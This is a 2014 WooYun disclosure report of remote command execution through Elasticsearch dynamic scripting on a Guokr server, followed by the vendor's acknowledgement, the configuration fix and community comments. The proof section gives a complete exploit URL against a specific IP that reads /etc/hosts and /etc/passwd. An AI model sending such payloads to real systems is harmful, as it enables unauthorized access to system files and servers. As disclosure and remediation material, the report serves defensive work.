当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061672

漏洞标题:果壳网某服务远程命令执行漏洞(非st2)

相关厂商:果壳传媒

漏洞作者: 小川

提交时间:2014-05-21 10:21

修复时间:2014-05-21 11:42

公开时间:2014-05-21 11:42

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-21: 细节已通知厂商并且等待厂商处理中
2014-05-21: 厂商已经确认,细节仅向厂商公开
2014-05-21: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

趁老猪还没提交,我先无节操的刷下分

详细说明:

ragecomic.png

漏洞证明:

.PNG


测试地址:
http://tool.scanv.com/es.html
相关资料:
http://blog.csdn.net/cnbird2008/article/details/25899319
测试请求:
http://111.13.57.138:9200/_search?source=%7B%22size%22%3A1%2C%22query%22%3A%7B%22filtered%22%3A%7B%22query%22%3A%7B%22match_all%22%3A%7B%7D%7D%7D%7D%2C%22script_fields%22%3A%7B%22%2Fetc%2Fhosts%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fhosts%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%2C%22%2Fetc%2Fpasswd%22%3A%7B%22script%22%3A%22import%20java.util.*%3B%5Cnimport%20java.io.*%3B%5Cnnew%20Scanner(new%20File(%5C%22%2Fetc%2Fpasswd%5C%22)).useDelimiter(%5C%22%5C%5C%5C%5CZ%5C%22).next()%3B%22%7D%7D%7D&callback=jQuery111107529820275958627_1400564696673&_=1400564696674

修复方案:

在配置文件elasticsearch.yml里设置script.disable_dynamic: true

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-05-21 10:32

厂商回复:

这台服务器目前未用于生产环境,属迁移时临时关掉iptables造成9200端口暴露。
但因这台服务器有内网访问权限,危害为中。

最新状态:

2014-05-21:确认时已经修复了,反正迟早要公开的~给大家看看暴漫吧


漏洞评价:

评论

  1. 2014-05-21 10:22 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    @小川 有木有漫画

  2. 2014-05-21 10:25 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @xser @疯狗 @Finger 我传错图片了,重新编辑了下,求审核

  3. 2014-05-21 10:29 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    是暴漫嘛

  4. 2014-05-21 10:37 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    嗯嗯!厂商确认倒是蛮快的

  5. 2014-05-21 10:41 | 果壳传媒(乌云厂商)

    @小川 已经关掉对外暴露的9200端口了。正在处理其他迁移过来还没开iptables的服务器。

  6. 2014-05-21 10:50 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    看到9200端口我就知道是啥洞了

  7. 2014-05-21 10:56 | 果壳传媒(乌云厂商)

    @孤独雪狼 最近玩得很惨啊,我们生产环境的9200一直是只允许内网访问的,之前漏洞爆出来时我还想着既然外网进不来也构造不了payload这事没啥大不了的;尼玛居然忘了一台闲置服务器还开着端口……

  8. 2014-05-21 11:02 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @果壳传媒 让我逮着了吧!

  9. 2014-05-21 11:09 | 果壳传媒(乌云厂商)

    @小川 牛逼~给你派礼物~

  10. 2014-05-21 11:52 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    修复时间: 2014-05-21 11:42 good!

  11. 2014-05-21 11:53 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    效率真快啊!

  12. 2014-05-21 12:13 | zmj ( 路人 | 还没有发布任何漏洞 | zmj)

    内网一样可以攻击的 @果壳传媒

  13. 2014-05-21 12:22 | 果壳传媒(乌云厂商)

    @zmj 嗯,防患未然,生产环境用的ES已经加了参数;至于gkserver08,ES服务已停止。

  14. 2014-05-21 12:25 | 果壳传媒(乌云厂商)

    @zmj 不过还是很好奇如果不通过第三方程序的漏洞,只对内网开放的端口要如何攻击?有空交流下?

  15. 2014-05-21 12:51 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    @果壳传媒 你忘记了CSRF

  16. 2014-05-21 13:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    直接关机?

  17. 2014-05-21 13:43 | 果壳传媒(乌云厂商)

    @xfkxfk 这个的确可以……不过,似乎也没有在生产环境上执行跨站脚本的机会;除非本人手贱……

  18. 2014-05-21 16:44 | 小怿 ( 路人 | Rank:29 漏洞数:6 | )

    @果壳传媒 原来你是大名鼎鼎的贱哥啊,久仰大名了。

  19. 2014-05-21 17:00 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)

    2014-05-21:确认时已经修复了,反正迟早要公开的~给大家看看暴漫吧 给大家看看暴漫吧 大家看看暴漫吧 看看暴漫吧 暴漫吧 吧

  20. 2014-05-21 17:06 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    感谢大牛!

  21. 2014-05-22 16:17 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    好快!

  22. 2014-05-22 23:47 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    果壳大赞!又看到了暴漫~

  23. 2014-05-24 19:42 | 伟哥 ( 普通白帽子 | Rank:110 漏洞数:29 | 不怕流氓有文化,就怕色狼有耐心,那么一只起...)

    厂商好人!

  24. 2014-05-24 22:24 | 风花雪月 ( 实习白帽子 | Rank:55 漏洞数:44 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)

    。。。@冷少 come on

  25. 2014-05-25 00:34 | 冷少 ( 路人 | Rank:14 漏洞数:4 | 专注网络安全,广交各地盆友~)

    @风花雪月 师傅,何事

  26. 2014-05-25 06:09 | 风花雪月 ( 实习白帽子 | Rank:55 漏洞数:44 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)

    @冷少 冷少机友 你来劲了。。。 Q聊把